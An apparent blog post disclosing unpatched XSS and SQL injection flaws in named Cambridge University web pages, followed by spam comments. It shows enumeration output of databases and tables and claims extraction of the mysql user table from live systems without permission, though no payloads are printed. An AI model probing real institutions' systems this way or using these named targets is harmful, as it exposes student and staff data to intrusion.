Cambridge University and their glaring vulnerabilities they refuse to patch.

About a month ago I decided to audit Cambridge University. I was hoping to find some webapp vulnerabilities which I could then report to get a bounty of some kind. I did a very basic audit, tested for Cross Site Scripting (XSS), Local File Inclusion (LFI)  and some other vulnerabilities such as SQL Injection (SQLi).  What I discovered for such a reputable University is crazy and the fact they won’t even respond to emails clearly implies they do not care whatsoever.

The first page I tested for XSS was their library page at http://www.lib.cam.ac.uk/

Yes, you guessed it. Vulnerable.

PoC:

 

the second page I tested was  http://webapps.fitzmuseum.cam.ac.uk

…and of course XSS yet again

Here’s my openbugbounty submission report: https://www.openbugbounty.org/reports/280729/

PoC:

 

I also looked for other things like their robots.txt file which can be found at http://www.lib.cam.ac.uk/robots.txt

I decided to stop looking for XSS on Cambridge as this site is  just littered with them. Can’t really do much either as they are non-persistent. (this doesn’t mean they shouldn’t be patched)

So to sum up the rest of this post…

 

Ok …. now let’s get straight to the more serious vulnerabilities which they should of most definitely patched by now but unfortunately they can’t even respond to emails. They also don’t seem to care at all as stated previously.

I will however post proof that these vulnerabilities can be exploited and that they are very SERIOUS.

The first SQLi vulnerability appears to be error based:

The database appears to have 20 columns from testing:

The attacker can now find the vulnerable columns and continue exploiting to get the database names/tables and then extract the data from them.

 

web server operating system: Linux Debian 8.0 (jessie)
Apache 2.4.10
MySQL >= 5.0
databases[6]
[*] generate
[*] images
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

 

Database: mysql
[24 tables]
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |

And here is the data extracted from the user table in the [mysql] database. I decided to format it using Excel:

[click to enlarge image]

Data can be extracted from anyone of those databases, if a malicious attacker were to extract info from a different table within the database they could get Student Private Information, staff and even private research material stored in the mySQL database

 

I will now move onto the second SQLi vulnerability, this is on the admin sub-domain of Cambridge it has one database and over 400 tables.

Database: *
[424 tables]
| ActiveDataFeed |
| Admin |
| Affichage1Affichage1edu |
| Ansicht1 |
| Apply |
| Auftrag |
| BOOK_AUTHORS |
| BUYER |
| Bestellungen |
| CLIENTES |
| CUSTOMER |
| Campus |
| Channel_Data |
| Coefficients |
| Compagnie |
| DC_Data |
| DSProp_table |
| DWE_Subscriptions |
| DWE_Task_Attributes |
| DWE_Workflow_Documents |
| D_Abbreviation |
| D_Format |
| D_PR_EVENTOS |
| Economy |
| Editor |
| Employees |
| Etudiant |
| Film |
| FindCriteria |
| GDirectedRoute |
| Genre |
| Gruppen |
| LT_CLASSE_FORO |
| LT_CUSTOM3 |
| LT_EVENTO |
| LT_NATUREZA |
| LT_SERIE |
| Languages |
| LastName |
| Lieux |
| M_CADASTRO_GERAL |
| M_ESQUEMA_PERMISSAO |
| M_RELATORIOS |
| NUEVOS |
| OperationStatus |
| PERSONAL |
| PREFIX_order_return_state_lang |
| PREFIX_tab |
| PREFIX_timezone |
| PRODUTO |
| PROFESORES |
| PUBLISHER |
| PZ |
| Pilot |
| Propdesc_table |
| Publication |
| QRTZ_JOB_DETAILS |
| RATING |
| ROLE |
| SGA_XPLAN_TPL_DBA_IND_COLUMNS |
| SGA_XPLAN_TPL_DBA_TABLES |
| SIGNON |
| S_LOG |
| SchemaInfo |
| Slot |
| SpecificationLink |
| Standorte |
| Station_Comment |
| Student |
| Studenten |
| SurveyRespondent |
| TBLUSERS |
| THOT_SUB_MENU |
| Tagebuch |
| ThumbnailKeyword |
| Titres |
| TotalMembers |
| Umfrage |
| VenuesNew |
| Volume |
| X_3945 |
| USER |
| keys |
| language |
| translation |
| about |
| account_level |
| accounts |
| actualites |
| add_irm |
| adminpwd |
| adminuser |
| agence |
| aggtest |
| alarms |
| aliastype |
| alike |
| app_user |
| applications |
| area |
| art |
| artist |
| attribut |
| audio |
| auto_id_tests |
| autore |
| autorizacaonfe |
| banners |
| based |
| be_users |
| been |
| binn_articles |
| binn_catalog_fields |
| binn_catprops |
| binn_catrights |
| binn_form39 |
| binn_imagelib_templ |
| binn_user_rights |
| bkp_ResourceFolder |
| categorylinks |
| cdb_access |
| cdb_adminactions |
| cdb_adminsessions |
| cdb_debates |
| cdb_forumrecommend |
| cdb_imagetypes |
| cdb_paymentlog |
| cdb_pluginvars |
| cdv_map_feature |
| cdv_passport_group |
| chat_users |
| cities |
| clients |
| clubconfig |
| cmRole |
| cmsusers |
| coherently |
| compositions |
| comune |
| conf |
| config |
| connectorswitches |
| content |
| continent |
| country |
| cpg132_users |
| cpg_config |
| credits |
| css_file |
| customers_basket |
| dbstudents |
| dbuser |
| department |
| dept_location |
| detrimental |
| developers |
| diary |
| dictionary |
| div_annotation_type |
| div_locality |
| div_poly_type |
| dpt_trans |
| dtb_bat_relate_products |
| dtb_blocposition |
| dtb_customer_reading |
| dtb_deliv |
| dtb_recommend_products |
| duvida |
| e107_user |
| employer |
| emu_services |
| eventi |
| ew_temi |
| extremes |
| ezin_authors |
| f_attributedependencies |
| f_options |
| f_spatialcontextgroup |
| festplatte |
| fiscal |
| foreigntest |
| form_data |
| forum_user_stat |
| fusion_user_groups |
| ganatlebe_ge |
| geo_Island |
| geraet |
| gesuche |
| glmm |
| grau_escolaridade |
| grind |
| groupe |
| gws_client |
| has |
| hersteller |
| history |
| honorsinfo |
| ibf_members_converge |
| imagelinks |
| images |
| interactions |
| interwiki |
| intranet_users |
| invite |
| isMember |
| itemnotafiscal |
| items_template |
| itens |
| jforum_smilies |
| jiveExtComponentConf |
| jiveGroupUser |
| jiveRoster |
| jiveRosterGroups |
| jiveUserProp |
| jiveVersion |
| jobs |
| jos_estadisticas |
| jos_jce_groups |
| jos_jce_plugins |
| jos_languages |
| jos_messages_cfg |
| jos_modules_menu |
| jos_moschat_users |
| jos_poll_data |
| jos_templates_menu |
| jos_vm_auth_group |
| jos_vm_cart |
| jos_vm_category_xref |
| jos_vm_currency |
| jos_vm_product_category_xref |
| jos_vm_product_type_parameter |
| jurosstrategy |
| kategorien |
| kauf_artikel |
| kpro_adminlogs |
| lending |
| liens |
| line_items_seq |
| liste_domaines |
| livre |
| loan |
| located |
| login_user |
| mailaddresses |
| manage |
| mapdata |
| marital_status |
| math |
| mein_doc_h |
| membership |
| mima |
| minutes |
| mitarbeiter |
| mlattach |
| modulerubriquephoto |
| monitoringi_ge |
| music_association |
| mymps_advertisement |
| mymps_member_album |
| ndash |
| networking |
| newsletter_recipients |
| nickel |
| nomarski |
| noncommercial |
| notafiscal_deducao |
| notizen |
| nuke_authors |
| nuke_autonews |
| nuke_bbgroups |
| nuke_bbtopics_watch |
| nuke_bbuser_group |
| nuke_bbvote_voters |
| nuke_config |
| nuke_counter |
| nuke_downloads_categories |
| nuke_downloads_downloads |
| nuke_downloads_modrequest |
| nuke_downloads_newdownload |
| nuke_links_modrequest |
| nuke_main |
| nuke_poll_desc |
| nuke_pollcomments |
| nuke_reviews_comments |
| nuke_session |
| nuke_stats_month |
| nuke_subscriptions |
| nulltest |
| obb_profiles |
| oil_bfsurvey_pro |
| oil_bfsurveypro_34 |
| oil_bfsurveypro_35 |
| oil_biolmed_entity_types |
| oil_dbcache |
| oil_modules_menu |
| oil_newsfeeds |
| oil_phocadownload |
| oil_phocadownload_categories |
| oil_phocagallery_votes |
| oil_rokdownloads |
| orders |
| organization |
| osc_manufacturers |
| osc_products_attributes |
| otherwise |
| package |
| pagelinks |
| paper |
| participate |
| periods |
| phorum_user |
| phpbb_banlist |
| phpbb_topics_watch |
| phpbb_vote_results |
| platforms |
| pma_relation |
| pma_table_coords |
| pma_table_info |
| polarised |
| poll_user |
| precipitation |
| preferences |
| presence |
| product |
| produtos |
| project_user_xref |
| property |
| province |
| pw_adminset |
| pw_forums |
| pw_hack |
| pw_wordfb |
| pwds |
| qrtz_simple_triggers |
| radacct |
| reciprocal_links |
| reciprocal_partnersites |
| registered |
| report |
| reserve |
| river |
| root |
| roots |
| rss |
| rss_subscription |
| sampleData |
| schema_info |
| seen |
| sf_guard_remember_key |
| singup |
| slserver |
| spip_caches |
| spip_meta |
| spip_mots |
| spip_versions |
| spip_versions_fragments |
| spip_visites |
| spip_visites_articles |
| stable |
| state |
| store3 |
| ststaff |
| stuser |
| subject |
| subscribe |
| sysadmin |
| system |
| t_snap |
| tables_priv |
| tb_nguoidungs |
| tblLayouts |
| tbl_login |
| tbl_works_categories |
| tblblogroles |
| tbllogins |
| tbuseraccounts |
| team |
| test_user |
| tester |
| three |
| time_zone_leap_second |
| transactions |
| trigger_depends |
| turizmi_ge |
| tusers |
| tx_tcdirectmail_clicklinks |
| u_n |
| un |
| uname |
| uniquetest |
| user_groups |
| user_nm |
| user_un |
| user_uname |
| user_usern |
| useradmin |
| userid |
| usern |
| usr_pw |
| vbulletin_session |
| vcd_CoversAllowedOnMediatypes |
| vcd_PornStudios |
| vcd_Pornstars |
| vcd_VcdToPornstars |
| vcd_VcdToSources |
| vendor |
| veranstalter |
| vertex |
| videos |
| vrls_listings |
| vrls_partners |
| vrls_xref_listing_type |
| vrls_xref_state_province |
| ways |
| webcal_config |
| webcal_entry_ext_user |
| win |
| wp_pod_types |
| wp_usermeta |
| writes |
| x_admin |
| xb0c |
| zo_kontakt_stelle |
| zones |

I don’t really want to drag this on so I will move straight onto the last SQLi Vulnerability:

And yes again, this can be exploited. 

 

Database: information_schema
[40 tables]
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |

So the message here is simple: get your sh*t patched and stop compromising student/staff data!

I wrote this up pretty quick and only decided to include database names & tables as I don’t want to compromise Cambridge anymore than they already are.

 

hope you enjoyed this lil writeup:)

20 Replies to “Cambridge University and their glaring vulnerabilities they refuse to patch.”

  1. I think what you published was very logical.

    But, consider this, what if you were to create a awesome headline?
    I ain’t saying your information is not good., but suppose you added a
    headline that grabbed a person’s attention? I mean Cambridge University and their
    glaring vulnerabilities they refuse to patch. is a little
    plain. You might glance at Yahoo’s home page and see how they create
    article headlines to grab viewers to click.
    You might try adding a video or a pic or two to grab people excited about everything’ve got to say.
    Just my opinion, it might make your posts a little bit more interesting.

  2. I know this if off topic but I’m looking into starting
    my own weblog and was curious what all is required to get setup?
    I’m assuming having a blog like yours would cost a pretty penny?
    I’m not very internet savvy so I’m not 100% positive.

    Any recommendations or advice would be greatly appreciated.
    Thanks

  3. Greetings from Ohio! I’m bored to death at work
    so I decided to check out your blog on my iphone during lunch break.
    I love the info you present here and can’t wait to take a look when I get home.
    I’m shocked at how quick your blog loaded on my cell
    phone .. I’m not even using WIFI, just 3G
    .. Anyhow, awesome blog!

  4. I like the helpful info you provide in your articles.
    I will bookmark your weblog and check again here regularly.
    I’m quite certain I will learn a lot of new stuff right
    here! Best of luck for the next!

  5. Wonderful goods from you, man. I’ve understand your stuff previous to and you are just extremely fantastic.
    I actually like what you have acquired here, certainly like what you’re
    stating and the way in which you say it. You make it entertaining and you still
    take care of to keep it smart. I cant wait to read much more from you.
    This is really a wonderful site.

  6. Please let me know if you’re looking for a article author for your weblog.
    You have some really great articles and I
    think I would be a good asset. If you ever want to
    take some of the load off, I’d really like to write
    some articles for your blog in exchange for a link back to mine.
    Please blast me an email if interested. Cheers!

  7. I’m not sure where you’re getting your information, but great topic. I needs to spend some time learning more or understanding more. Thanks for magnificent info I was looking for this info for my mission.

Leave a Reply

Your email address will not be published. Required fields are marked *